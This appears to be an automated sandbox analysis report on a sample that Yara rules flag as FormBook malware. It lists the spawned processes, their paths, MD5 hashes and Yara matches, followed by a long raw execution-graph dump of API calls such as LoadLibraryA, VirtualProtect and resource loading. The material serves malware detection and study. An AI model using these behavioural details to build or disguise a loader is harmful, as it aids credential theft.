                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1736362212.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1737238924.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:08:37:29
                                                    Start date:13/12/2024
                                                    Path:C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe"
                                                    Imagebase:0xa0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2559379970.0000000003750000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:6
                                                    Start time:08:37:31
                                                    Start date:13/12/2024
                                                    Path:C:\Windows\SysWOW64\comp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\comp.exe"
                                                    Imagebase:0xc80000
                                                    File size:23'552 bytes
                                                    MD5 hash:712EF348F7032AA1C80D24600BA5452D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2557800051.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2560519490.0000000000890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2561398327.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:7
                                                    Start time:08:37:44
                                                    Start date:13/12/2024
                                                    Path:C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe"
                                                    Imagebase:0xa0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2561468809.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:11
                                                    Start time:08:37:57
                                                    Start date:13/12/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff722870000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                      Execution Graph

                                                      Execution Coverage:3.8%
                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                      Signature Coverage:6.9%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:77
API calls 4 library calls 101299->101339 101300->101265 101301->101265 101303 7d84cb 101302->101303 101305 7d84f2 101303->101305 101342 7d89b3 69 API calls Mailbox 101303->101342 101305->101265 101306->101262 101307->101265 101308->101265 101309->101265 101310->101265 101311->101265 101312->101255 101313->101260 101314->101265 101315->101265 101317 7d9d4a 101316->101317 101327 7d9d78 Mailbox 101316->101327 101318 7d9d9d 101317->101318 101322 7d9d50 Mailbox 101317->101322 101321 7d8047 59 API calls 101318->101321 101319 7d9d64 101323 7d9dcc 101319->101323 101324 7d9d6f 101319->101324 101319->101327 101320 80fa0f 101320->101327 101344 826e8f 59 API calls 101320->101344 101321->101327 101322->101319 101322->101320 101323->101327 101343 7d8cd4 59 API calls Mailbox 101323->101343 101326 80f9e6 VariantClear 101324->101326 101324->101327 101326->101327 101327->101265 101329->101265 101331 7d805a 101330->101331 101332 7d8052 101330->101332 101331->101265 101345 7d7f77 59 API calls 2 library calls 101332->101345 101334->101260 101335->101254 101336->101284 101337->101284 101338->101289 101339->101287 101340->101282 101341->101287 101342->101305 101343->101327 101344->101327 101345->101331 101346 80fe27 101359 7ef944 101346->101359 101348 80fe3d 101349 80fe53 101348->101349 101350 80febe 101348->101350 101448 7d9e5d 60 API calls 101349->101448 101368 7dfce0 101350->101368 101352 80fe92 101354 80fe9a 101352->101354 101355 81089c 101352->101355 101449 83834f 59 API calls Mailbox 101354->101449 101450 839e4a 89 API calls 4 library calls 101355->101450 101358 80feb2 Mailbox 101360 7ef962 101359->101360 101361 7ef950 101359->101361 101363 7ef968 101360->101363 101364 7ef991 101360->101364 101362 7d9d3c 60 API calls 101361->101362 101367 7ef95a 101362->101367 101365 7f0db6 Mailbox 59 API calls 101363->101365 101366 7d9d3c 60 API calls 101364->101366 101365->101367 101366->101367 101367->101348 101451 7d8180 101368->101451 101370 7dfd3d 101371 7e06f6 101370->101371 101372 81472d 
101370->101372 101456 7df234 101370->101456 101562 839e4a 89 API calls 4 library calls 101371->101562 101563 839e4a 89 API calls 4 library calls 101372->101563 101376 814742 101377 81488d 101377->101376 101380 7dfe4c 101377->101380 101569 84a2d9 85 API calls Mailbox 101377->101569 101378 7dfe3e 101378->101377 101378->101380 101567 8266ec 59 API calls 2 library calls 101378->101567 101379 7e0517 101386 7f0db6 Mailbox 59 API calls 101379->101386 101388 8148f9 101380->101388 101435 814b53 101380->101435 101460 7d837c 101380->101460 101381 8147d7 101381->101376 101565 839e4a 89 API calls 4 library calls 101381->101565 101398 7e0545 _memmove 101386->101398 101387 814848 101568 8260ef 59 API calls 2 library calls 101387->101568 101393 814917 101388->101393 101571 7d85c0 101388->101571 101391 814755 101391->101381 101564 7df6a3 341 API calls 101391->101564 101402 814928 101393->101402 101403 7d85c0 59 API calls 101393->101403 101394 7dfea4 101404 814ad6 101394->101404 101405 7dff32 101394->101405 101441 7e0179 Mailbox _memmove 101394->101441 101395 81486b 101399 7d9ea0 341 API calls 101395->101399 101396 8148b2 Mailbox 101396->101380 101570 8266ec 59 API calls 2 library calls 101396->101570 101406 7f0db6 Mailbox 59 API calls 101398->101406 101399->101377 101400 7f0db6 59 API calls Mailbox 101410 7dfdd3 101400->101410 101402->101441 101579 8260ab 59 API calls Mailbox 101402->101579 101403->101402 101583 839ae7 60 API calls 101404->101583 101409 7f0db6 Mailbox 59 API calls 101405->101409 101432 7e0106 _memmove 101406->101432 101412 7dff39 101409->101412 101410->101376 101410->101378 101410->101379 101410->101391 101410->101398 101410->101400 101413 7d9ea0 341 API calls 101410->101413 101420 81480c 101410->101420 101412->101371 101467 7e09d0 101412->101467 101413->101410 101414 814a4d 101415 7d9ea0 341 API calls 101414->101415 101417 814a87 101415->101417 101417->101376 101422 7d84c0 69 API calls 101417->101422 101419 7dffb2 101419->101371 101419->101398 101426 7dffe6 
101419->101426 101566 839e4a 89 API calls 4 library calls 101420->101566 101425 814ab2 101422->101425 101582 839e4a 89 API calls 4 library calls 101425->101582 101429 7d8047 59 API calls 101426->101429 101433 7e0007 101426->101433 101428 7d9d3c 60 API calls 101428->101441 101429->101433 101430 7f0db6 59 API calls Mailbox 101430->101441 101432->101441 101447 7e0162 101432->101447 101557 7d9c90 101432->101557 101433->101371 101436 814b24 101433->101436 101439 7e004c 101433->101439 101434 7e0398 101434->101358 101435->101376 101584 839e4a 89 API calls 4 library calls 101435->101584 101437 7d9d3c 60 API calls 101436->101437 101437->101435 101438 7e00d8 101440 7d9d3c 60 API calls 101438->101440 101439->101371 101439->101435 101439->101438 101443 7e00eb 101440->101443 101441->101371 101441->101414 101441->101425 101441->101428 101441->101430 101441->101434 101442 814a1c 101441->101442 101555 7d8740 68 API calls __cinit 101441->101555 101556 7d8660 68 API calls 101441->101556 101580 835937 68 API calls 101441->101580 101581 7d89b3 69 API calls Mailbox 101441->101581 101445 7f0db6 Mailbox 59 API calls 101442->101445 101443->101371 101544 7d82df 101443->101544 101445->101414 101447->101358 101448->101352 101449->101358 101450->101358 101452 7d818f 101451->101452 101455 7d81aa 101451->101455 101453 7d7e4f 59 API calls 101452->101453 101454 7d8197 CharUpperBuffW 101453->101454 101454->101455 101455->101370 101457 7df251 101456->101457 101458 7df272 101457->101458 101585 839e4a 89 API calls 4 library calls 101457->101585 101458->101410 101461 7d838d 101460->101461 101462 80edbd 101460->101462 101463 7f0db6 Mailbox 59 API calls 101461->101463 101464 7d8394 101463->101464 101465 7d83b5 101464->101465 101586 7d8634 59 API calls Mailbox 101464->101586 101465->101388 101465->101394 101468 814cc3 101467->101468 101476 7e09f5 101467->101476 101653 839e4a 89 API calls 4 library calls 101468->101653 101470 7e0cfa 101470->101419 101472 7e0ee4 101472->101470 101474 7e0ef1 101472->101474 
101651 7e1093 341 API calls Mailbox 101474->101651 101475 7e0a4b PeekMessageW 101542 7e0a05 Mailbox 101475->101542 101476->101542 101654 7d9e5d 60 API calls 101476->101654 101655 826349 341 API calls 101476->101655 101478 7e0ef8 LockWindowUpdate DestroyWindow GetMessageW 101478->101470 101481 7e0f2a 101478->101481 101480 814e81 Sleep 101480->101542 101484 815c58 TranslateMessage DispatchMessageW GetMessageW 101481->101484 101482 7e0ce4 101482->101470 101650 7e1070 10 API calls Mailbox 101482->101650 101484->101484 101485 815c88 101484->101485 101485->101470 101486 7e0ea5 TranslateMessage DispatchMessageW 101487 7e0e43 PeekMessageW 101486->101487 101487->101542 101488 814d50 TranslateAcceleratorW 101488->101487 101488->101542 101489 7d9e5d 60 API calls 101489->101542 101490 7e0d13 timeGetTime 101490->101542 101491 81581f WaitForSingleObject 101495 81583c GetExitCodeProcess CloseHandle 101491->101495 101491->101542 101493 7f0db6 59 API calls Mailbox 101493->101542 101494 7d7667 59 API calls 101528 7e0e70 Mailbox 101494->101528 101526 7e0f95 101495->101526 101496 7e0e5f Sleep 101496->101528 101497 7d8047 59 API calls 101497->101542 101498 815af8 Sleep 101498->101528 101501 7f049f timeGetTime 101501->101528 101502 7e0f4e timeGetTime 101652 7d9e5d 60 API calls 101502->101652 101505 815b8f GetExitCodeProcess 101509 815ba5 WaitForSingleObject 101505->101509 101510 815bbb CloseHandle 101505->101510 101507 855f25 110 API calls 101507->101528 101508 7db7dd 109 API calls 101508->101528 101509->101510 101509->101542 101510->101528 101513 815874 101513->101526 101514 815078 Sleep 101514->101542 101515 815c17 Sleep 101515->101542 101518 7d7de1 59 API calls 101518->101528 101521 7d9ea0 314 API calls 101521->101542 101524 7dfce0 314 API calls 101524->101542 101526->101419 101528->101494 101528->101501 101528->101505 101528->101507 101528->101508 101528->101513 101528->101514 101528->101515 101528->101518 101528->101526 101528->101542 101679 832408 60 API calls 101528->101679 
101680 7d9e5d 60 API calls 101528->101680 101681 7d89b3 69 API calls Mailbox 101528->101681 101682 7db73c 341 API calls 101528->101682 101683 8264da 60 API calls 101528->101683 101684 835244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101528->101684 101685 833c55 66 API calls Mailbox 101528->101685 101530 839e4a 89 API calls 101530->101542 101531 7d9c90 59 API calls Mailbox 101531->101542 101532 7d82df 59 API calls 101532->101542 101533 7d84c0 69 API calls 101533->101542 101534 82617e 59 API calls Mailbox 101534->101542 101535 7d7de1 59 API calls 101535->101542 101536 7d89b3 69 API calls 101536->101542 101537 8155d5 VariantClear 101537->101542 101538 826e8f 59 API calls 101538->101542 101539 81566b VariantClear 101539->101542 101540 815419 VariantClear 101540->101542 101541 7d8cd4 59 API calls Mailbox 101541->101542 101542->101475 101542->101480 101542->101482 101542->101486 101542->101487 101542->101488 101542->101489 101542->101490 101542->101491 101542->101493 101542->101496 101542->101497 101542->101498 101542->101502 101542->101521 101542->101524 101542->101526 101542->101528 101542->101530 101542->101531 101542->101532 101542->101533 101542->101534 101542->101535 101542->101536 101542->101537 101542->101538 101542->101539 101542->101540 101542->101541 101543 7db73c 314 API calls 101542->101543 101587 7de420 101542->101587 101594 7de6a0 101542->101594 101625 7df460 101542->101625 101645 7d31ce 101542->101645 101656 856018 59 API calls 101542->101656 101657 839a15 59 API calls Mailbox 101542->101657 101658 82d4f2 59 API calls 101542->101658 101659 7d9837 101542->101659 101677 8260ef 59 API calls 2 library calls 101542->101677 101678 7d8401 59 API calls 101542->101678 101543->101542 101545 80eda1 101544->101545 101546 7d82f2 101544->101546 101547 80edb1 101545->101547 102749 8261a4 59 API calls 101545->102749 101548 7d8339 Mailbox 101546->101548 101550 7d831c 101546->101550 101551 7d85c0 59 API calls 101546->101551 
101548->101432 101552 7d8322 101550->101552 101553 7d85c0 59 API calls 101550->101553 101551->101550 101552->101548 101554 7d9c90 Mailbox 59 API calls 101552->101554 101553->101552 101554->101548 101555->101441 101556->101441 101558 7d9c9b 101557->101558 101559 7d9cd2 101558->101559 102750 7d8cd4 59 API calls Mailbox 101558->102750 101559->101432 101561 7d9cfd 101561->101432 101562->101372 101563->101376 101564->101381 101565->101376 101566->101376 101567->101387 101568->101395 101569->101396 101570->101396 101572 7d85ce 101571->101572 101578 7d85f6 101571->101578 101573 7d85dc 101572->101573 101574 7d85c0 59 API calls 101572->101574 101575 7d85e2 101573->101575 101576 7d85c0 59 API calls 101573->101576 101574->101573 101577 7d9c90 Mailbox 59 API calls 101575->101577 101575->101578 101576->101575 101577->101578 101578->101393 101579->101441 101580->101441 101581->101441 101582->101376 101583->101426 101584->101376 101585->101458 101586->101465 101588 7de43d 101587->101588 101589 7de451 101587->101589 101590 7de448 101588->101590 101686 7ddf00 341 API calls 2 library calls 101588->101686 101687 839e4a 89 API calls 4 library calls 101589->101687 101590->101542 101593 813aa4 101593->101593 101595 7de6d5 101594->101595 101596 813aa9 101595->101596 101599 7de73f 101595->101599 101608 7de799 101595->101608 101597 7d9ea0 341 API calls 101596->101597 101598 813abe 101597->101598 101624 7de970 Mailbox 101598->101624 101689 839e4a 89 API calls 4 library calls 101598->101689 101601 7d7667 59 API calls 101599->101601 101599->101608 101600 7d7667 59 API calls 101600->101608 101603 813b04 101601->101603 101605 7f2d40 __cinit 67 API calls 101603->101605 101604 7f2d40 __cinit 67 API calls 101604->101608 101605->101608 101606 813b26 101606->101542 101607 7d84c0 69 API calls 101607->101624 101608->101600 101608->101604 101608->101606 101609 7de95a 101608->101609 101608->101624 101609->101624 101690 839e4a 89 API calls 4 library calls 101609->101690 101611 7d8d40 59 API calls 
101611->101624 101613 7d9ea0 341 API calls 101613->101624 101614 7d9c90 Mailbox 59 API calls 101614->101624 101620 839e4a 89 API calls 101620->101624 101621 813e25 101621->101542 101622 7df195 101694 839e4a 89 API calls 4 library calls 101622->101694 101623 7dea78 101623->101542 101624->101607 101624->101611 101624->101613 101624->101614 101624->101620 101624->101622 101624->101623 101688 7d7f77 59 API calls 2 library calls 101624->101688 101691 826e8f 59 API calls 101624->101691 101692 84c5c3 341 API calls 101624->101692 101693 84b53c 341 API calls Mailbox 101624->101693 101695 8493c6 341 API calls Mailbox 101624->101695 101626 7df4ba 101625->101626 101627 7df650 101625->101627 101628 7df4c6 101626->101628 101629 81441e 101626->101629 101630 7d7de1 59 API calls 101627->101630 101797 7df290 341 API calls 2 library calls 101628->101797 101798 84bc6b 101629->101798 101636 7df58c Mailbox 101630->101636 101633 81442c 101637 7df630 101633->101637 101838 839e4a 89 API calls 4 library calls 101633->101838 101635 7df4fd 101635->101633 101635->101636 101635->101637 101696 833c37 101636->101696 101699 84df37 101636->101699 101702 84445a 101636->101702 101711 83cb7a 101636->101711 101791 7d4e4a 101636->101791 101637->101542 101638 7d9c90 Mailbox 59 API calls 101639 7df5e3 101638->101639 101639->101637 101639->101638 101646 7d3212 101645->101646 101648 7d31e0 101645->101648 101646->101542 101647 7d3205 IsDialogMessageW 101647->101646 101647->101648 101648->101646 101648->101647 101649 80cf32 GetClassLongW 101648->101649 101649->101647 101649->101648 101650->101472 101651->101478 101652->101542 101653->101476 101654->101476 101655->101476 101656->101542 101657->101542 101658->101542 101660 7d9851 101659->101660 101672 7d984b 101659->101672 101661 80f5d3 __i64tow 101660->101661 101662 7d9899 101660->101662 101663 7d9857 __itow 101660->101663 101667 80f4da 101660->101667 102747 7f3698 83 API calls 3 library calls 101662->102747 101665 7f0db6 Mailbox 59 API calls 101663->101665 
101669 7d9871 101665->101669 101668 80f552 Mailbox _wcscpy 101667->101668 101670 7f0db6 Mailbox 59 API calls 101667->101670 102748 7f3698 83 API calls 3 library calls 101668->102748 101671 7d7de1 59 API calls 101669->101671 101669->101672 101673 80f51f 101670->101673 101671->101672 101672->101542 101674 7f0db6 Mailbox 59 API calls 101673->101674 101675 80f545 101674->101675 101675->101668 101676 7d7de1 59 API calls 101675->101676 101676->101668 101677->101542 101678->101542 101679->101528 101680->101528 101681->101528 101682->101528 101683->101528 101684->101528 101685->101528 101686->101590 101687->101593 101688->101624 101689->101624 101690->101624 101691->101624 101692->101624 101693->101624 101694->101621 101695->101624 101839 83445a GetFileAttributesW 101696->101839 101843 84cadd 101699->101843 101701 84df47 101701->101639 101703 7d9837 84 API calls 101702->101703 101704 844494 101703->101704 101966 7d6240 101704->101966 101706 8444a4 101707 7d9ea0 341 API calls 101706->101707 101708 8444c9 101706->101708 101707->101708 101710 8444cd 101708->101710 101991 7d9a98 59 API calls Mailbox 101708->101991 101710->101639 101712 7d7667 59 API calls 101711->101712 101713 83cbaf 101712->101713 101714 7d7667 59 API calls 101713->101714 101715 83cbb8 101714->101715 101716 83cbcc 101715->101716 102207 7d9b3c 59 API calls 101715->102207 101718 7d9837 84 API calls 101716->101718 101719 83cbe9 101718->101719 101720 83cc0b 101719->101720 101721 83ccea 101719->101721 101726 83cd1a Mailbox 101719->101726 101722 7d9837 84 API calls 101720->101722 102011 7d4ddd 101721->102011 101724 83cc17 101722->101724 101727 7d8047 59 API calls 101724->101727 101726->101639 101729 83cc23 101727->101729 101728 83cd16 101728->101726 101731 7d7667 59 API calls 101728->101731 101735 83cc37 101729->101735 101736 83cc69 101729->101736 101730 7d4ddd 136 API calls 101730->101728 101732 83cd4b 101731->101732 101733 7d7667 59 API calls 101732->101733 101734 83cd54 101733->101734 101738 7d7667 59 API calls 
101734->101738 101739 7d8047 59 API calls 101735->101739 101737 7d9837 84 API calls 101736->101737 101740 83cc76 101737->101740 101741 83cd5d 101738->101741 101742 83cc47 101739->101742 101743 7d8047 59 API calls 101740->101743 101744 7d7667 59 API calls 101741->101744 101745 7d7cab 59 API calls 101742->101745 101746 83cc82 101743->101746 101747 83cd66 101744->101747 101748 83cc51 101745->101748 102208 834a31 GetFileAttributesW 101746->102208 101750 7d9837 84 API calls 101747->101750 101751 7d9837 84 API calls 101748->101751 101753 83cd73 101750->101753 101754 83cc5d 101751->101754 101752 83cc8b 101755 83cc9e 101752->101755 101758 7d79f2 59 API calls 101752->101758 102035 7d459b 101753->102035 101757 7d7b2e 59 API calls 101754->101757 101760 7d9837 84 API calls 101755->101760 101765 83cca4 101755->101765 101757->101736 101758->101755 101759 83cd8e 102086 7d79f2 101759->102086 101762 83cccb 101760->101762 102209 8337ef 75 API calls Mailbox 101762->102209 101765->101726 101766 83cdd1 101767 7d8047 59 API calls 101766->101767 101769 83cddf 101767->101769 101768 7d79f2 59 API calls 101770 83cdae 101768->101770 102089 7d7b2e 101769->102089 101770->101766 101772 7d7bcc 59 API calls 101770->101772 101774 83cdc3 101772->101774 101776 7d7bcc 59 API calls 101774->101776 101775 7d7b2e 59 API calls 101777 83cdfb 101775->101777 101776->101766 101778 7d7b2e 59 API calls 101777->101778 101779 83ce09 101778->101779 101780 7d9837 84 API calls 101779->101780 101781 83ce15 101780->101781 102098 834071 101781->102098 101783 83ce26 101784 833c37 3 API calls 101783->101784 101785 83ce30 101784->101785 101786 7d9837 84 API calls 101785->101786 101790 83ce61 101785->101790 101787 83ce4e 101786->101787 102152 839155 101787->102152 101789 7d4e4a 84 API calls 101789->101726 101790->101789 101792 7d4e5b 101791->101792 101793 7d4e54 101791->101793 101795 7d4e7b FreeLibrary 101792->101795 101796 7d4e6a 101792->101796 101794 7f53a6 __fcloseall 83 API calls 101793->101794 101794->101792 
101795->101796 101796->101639 101797->101635 101799 84bc96 101798->101799 101800 84bcb0 101798->101800 102739 839e4a 89 API calls 4 library calls 101799->102739 102740 84a213 59 API calls Mailbox 101800->102740 101803 84bcbb 101804 7d9ea0 340 API calls 101803->101804 101805 84bd1c 101804->101805 101806 84bdae 101805->101806 101809 84bd5d 101805->101809 101815 84bca8 Mailbox 101805->101815 101807 84be04 101806->101807 101808 84bdb4 101806->101808 101810 7d9837 84 API calls 101807->101810 101807->101815 102742 83791a 59 API calls 101808->102742 102741 8372df 59 API calls Mailbox 101809->102741 101811 84be16 101810->101811 101814 7d7e4f 59 API calls 101811->101814 101819 84be3a CharUpperBuffW 101814->101819 101815->101633 101816 84bdd7 102743 7d5d41 59 API calls Mailbox 101816->102743 101818 84bd8d 101821 7df460 340 API calls 101818->101821 101822 84be54 101819->101822 101820 84bddf Mailbox 101825 7dfce0 340 API calls 101820->101825 101821->101815 101823 84bea7 101822->101823 101824 84be5b 101822->101824 101826 7d9837 84 API calls 101823->101826 102744 8372df 59 API calls Mailbox 101824->102744 101825->101815 101827 84beaf 101826->101827 102745 7d9e5d 60 API calls 101827->102745 101830 84be89 101831 7df460 340 API calls 101830->101831 101831->101815 101832 84beb9 101832->101815 101833 7d9837 84 API calls 101832->101833 101834 84bed4 101833->101834 102746 7d5d41 59 API calls Mailbox 101834->102746 101836 84bee4 101837 7dfce0 340 API calls 101836->101837 101837->101815 101838->101637 101840 833c3e 101839->101840 101841 834475 FindFirstFileW 101839->101841 101840->101639 101841->101840 101842 83448a FindClose 101841->101842 101842->101840 101844 7d9837 84 API calls 101843->101844 101845 84cb1a 101844->101845 101850 84cb61 Mailbox 101845->101850 101881 84d7a5 101845->101881 101847 84cbb2 Mailbox 101847->101850 101855 7d9837 84 API calls 101847->101855 101868 84cdb9 101847->101868 101913 84fbce 59 API calls 2 library calls 101847->101913 101914 84cfdf 61 API calls 2 
library calls 101847->101914 101848 84cf2e 101930 84d8c8 92 API calls Mailbox 101848->101930 101850->101701 101852 84cf3d 101853 84cdc7 101852->101853 101854 84cf49 101852->101854 101894 84c96e 101853->101894 101854->101850 101855->101847 101860 84ce00 101909 7f0c08 101860->101909 101863 84ce33 101916 7d92ce 101863->101916 101864 84ce1a 101915 839e4a 89 API calls 4 library calls 101864->101915 101867 84ce25 GetCurrentProcess TerminateProcess 101867->101863 101868->101848 101868->101853 101873 84cfa4 101873->101850 101876 84cfb8 FreeLibrary 101873->101876 101874 84ce6b 101928 84d649 107 API calls _free 101874->101928 101876->101850 101879 7d9d3c 60 API calls 101880 84ce7c 101879->101880 101880->101873 101880->101879 101929 7d8d40 59 API calls Mailbox 101880->101929 101931 84d649 107 API calls _free 101880->101931 101882 7d7e4f 59 API calls 101881->101882 101883 84d7c0 CharLowerBuffW 101882->101883 101932 82f167 101883->101932 101887 7d7667 59 API calls 101888 84d7f9 101887->101888 101939 7d784b 101888->101939 101890 84d810 101891 7d7d2c 59 API calls 101890->101891 101892 84d81c Mailbox 101891->101892 101893 84d858 Mailbox 101892->101893 101952 84cfdf 61 API calls 2 library calls 101892->101952 101893->101847 101895 84c989 101894->101895 101899 84c9de 101894->101899 101896 7f0db6 Mailbox 59 API calls 101895->101896 101898 84c9ab 101896->101898 101897 7f0db6 Mailbox 59 API calls 101897->101898 101898->101897 101898->101899 101900 84da50 101899->101900 101901 84dc79 Mailbox 101900->101901 101908 84da73 _strcat _wcscpy __wsetenvp 101900->101908 101901->101860 101902 7d9b98 59 API calls 101902->101908 101903 7d9be6 59 API calls 101903->101908 101904 7d9b3c 59 API calls 101904->101908 101905 7f571c 58 API calls __crtLCMapStringA_stat 101905->101908 101906 7d9837 84 API calls 101906->101908 101908->101901 101908->101902 101908->101903 101908->101904 101908->101905 101908->101906 101956 835887 61 API calls 2 library calls 101908->101956 101910 7f0c1d 101909->101910 101911 
7f0cb5 VirtualProtect 101910->101911 101912 7f0c83 101910->101912 101911->101912 101912->101863 101912->101864 101913->101847 101914->101847 101915->101867 101917 7d92d6 101916->101917 101918 7f0db6 Mailbox 59 API calls 101917->101918 101919 7d92e4 101918->101919 101920 7d92f0 101919->101920 101957 7d91fc 59 API calls Mailbox 101919->101957 101922 7d9050 101920->101922 101958 7d9160 101922->101958 101924 7d905f 101925 7f0db6 Mailbox 59 API calls 101924->101925 101926 7d90fb 101924->101926 101925->101926 101926->101880 101927 7d8d40 59 API calls Mailbox 101926->101927 101927->101874 101928->101880 101929->101880 101930->101852 101931->101880 101934 82f192 __wsetenvp 101932->101934 101933 82f1d1 101933->101887 101933->101892 101934->101933 101935 82f1c7 101934->101935 101936 82f278 101934->101936 101935->101933 101953 7d78c4 61 API calls 101935->101953 101936->101933 101954 7d78c4 61 API calls 101936->101954 101940 7d785a 101939->101940 101941 7d78b7 101939->101941 101940->101941 101943 7d7865 101940->101943 101942 7d7d2c 59 API calls 101941->101942 101944 7d7888 _memmove 101942->101944 101945 80eb09 101943->101945 101946 7d7880 101943->101946 101944->101890 101947 7d8029 59 API calls 101945->101947 101955 7d7f27 59 API calls Mailbox 101946->101955 101949 80eb13 101947->101949 101950 7f0db6 Mailbox 59 API calls 101949->101950 101951 80eb33 101950->101951 101952->101893 101953->101935 101954->101936 101955->101944 101956->101908 101957->101920 101959 7d9169 Mailbox 101958->101959 101960 80f19f 101959->101960 101965 7d9173 101959->101965 101961 7f0db6 Mailbox 59 API calls 101960->101961 101963 80f1ab 101961->101963 101962 7d917a 101962->101924 101964 7d9c90 Mailbox 59 API calls 101964->101965 101965->101962 101965->101964 101992 7d7a16 101966->101992 101968 7d646a 101999 7d750f 101968->101999 101972 80dff6 102009 82f8aa 91 API calls 4 library calls 101972->102009 101975 7d6484 Mailbox 101975->101706 101977 7d750f 59 API calls 101985 7d6265 101977->101985 101978 80e004 
101980 7d750f 59 API calls 101978->101980 101979 7d7d8c 59 API calls 101979->101985 101981 80e01a 101980->101981 101981->101975 101982 7d6799 _memmove 102010 82f8aa 91 API calls 4 library calls 101982->102010 101983 80df92 101984 7d8029 59 API calls 101983->101984 101986 80df9d 101984->101986 101985->101968 101985->101972 101985->101977 101985->101979 101985->101982 101985->101983 101988 7d7e4f 59 API calls 101985->101988 101997 7d5f6c 60 API calls 101985->101997 101998 7d5d41 59 API calls Mailbox 101985->101998 102007 7d5e72 60 API calls 101985->102007 102008 7d7924 59 API calls 2 library calls 101985->102008 101990 7f0db6 Mailbox 59 API calls 101986->101990 101989 7d643b CharUpperBuffW 101988->101989 101989->101985 101990->101982 101991->101710 101993 7f0db6 Mailbox 59 API calls 101992->101993 101994 7d7a3b 101993->101994 101995 7d8029 59 API calls 101994->101995 101996 7d7a4a 101995->101996 101996->101985 101997->101985 101998->101985 102000 7d75af 101999->102000 102006 7d7522 _memmove 101999->102006 102002 7f0db6 Mailbox 59 API calls 102000->102002 102001 7f0db6 Mailbox 59 API calls 102003 7d7529 102001->102003 102002->102006 102004 7d7552 102003->102004 102005 7f0db6 Mailbox 59 API calls 102003->102005 102004->101975 102005->102004 102006->102001 102007->101985 102008->101985 102009->101978 102010->101975 102210 7d4bb5 102011->102210 102016 7d4e08 LoadLibraryExW 102220 7d4b6a 102016->102220 102017 80d8e6 102018 7d4e4a 84 API calls 102017->102018 102020 80d8ed 102018->102020 102022 7d4b6a 3 API calls 102020->102022 102024 80d8f5 102022->102024 102246 7d4f0b 102024->102246 102025 7d4e2f 102025->102024 102026 7d4e3b 102025->102026 102028 7d4e4a 84 API calls 102026->102028 102029 7d4e40 102028->102029 102029->101728 102029->101730 102032 80d91c 102254 7d4ec7 102032->102254 102036 7d7667 59 API calls 102035->102036 102037 7d45b1 102036->102037 102038 7d7667 59 API calls 102037->102038 102039 7d45b9 102038->102039 102040 7d7667 59 API calls 102039->102040 102041 
Execution graph (fragment, condensed from the report's graph export)

[Residue of the interactive execution graph. It was exported as a token stream, "<node id> <virtual address> <label>" for nodes and "<node id>-><node id>" for edges, which is not readable as text, so only the recoverable information is kept here. The fragment covers the sample's own code at virtual addresses between 7d1016 and 84df23; most node labels are CRT internals (__lock, __tzset_nolock, _memmove, __wfsopen, __getptd_noexit, _wcscmp, _wcscat) or "N API calls" summaries. The Win32 APIs named on nodes in this fragment are:]

Dynamic import: LoadLibraryA, GetProcAddress, FreeLibrary (GetNativeSystemInfo is reached through a LoadLibraryA/GetProcAddress stub at 7d4b37 rather than a static import)
Resource loading: FindResourceExW, LoadResource, SizeofResource, LockResource, CreateStreamOnHGlobal
